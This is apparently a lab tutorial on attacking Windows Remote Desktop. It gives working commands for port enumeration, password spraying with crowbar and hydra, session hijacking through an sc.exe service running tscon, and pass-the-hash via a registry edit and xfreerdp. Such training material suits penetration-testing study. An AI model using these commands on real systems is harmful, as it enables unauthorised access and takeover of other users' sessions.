Attacking RDP
Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft which provides a user with a graphical interface to connect to another computer over a network connection. It is also one of the most popular administration tools, allowing system administrators to centrally control their remote systems with the same functionality as if they were on-site.
By default, RDP uses port TCP/3389.
Enumeration
nmap -Pn -p3389 <ip-address>Misconfiguration
Since RDP takes user credentials for authentication, one common attack vector against the RDP protocol is password guessing.
Using the Crowbar tool, we can perform a password spraying attack against the RDP service.
Crowbar - RDP Password Spraying
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'Hydra - RDP Password Spraying
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdpRDP Login
rdesktop -u admin -p password123 192.168.2.143Protocol Specific Attacks
RDP Session Hijacking

To successfully impersonate a user without their password, we need to have SYSTEM privileges and use the Microsoft tscon.exe binary that enables users to connect to another desktop session.
C:\htb> tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}If we have local administrator privileges, we can use several methods to obtain SYSTEM privileges, such as PsExec or Mimikatz. A simple trick is to create a Windows service that, by default, will run as Local System and will execute any binary with SYSTEM privileges. We will use Microsoft sc.exe binary.
C:\htb> query user
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>juurena rdp-tcp#13 1 Active 7 8/25/2021 1:23 AM
lewen rdp-tcp#14 2 Active * 8/25/2021 1:28 AM
C:\htb> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
[SC] CreateService SUCCESS
C:\htb> net start sessionhijackRDP Pass-the-Hash (PtH)
Adding the DisableRestrictedAdmin Registry Key
C:\htb> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
xfreerdp /v:192.168.220.152 /u:lewen /pth:300FF5E89EF33F83A8146C10F5AB9BB9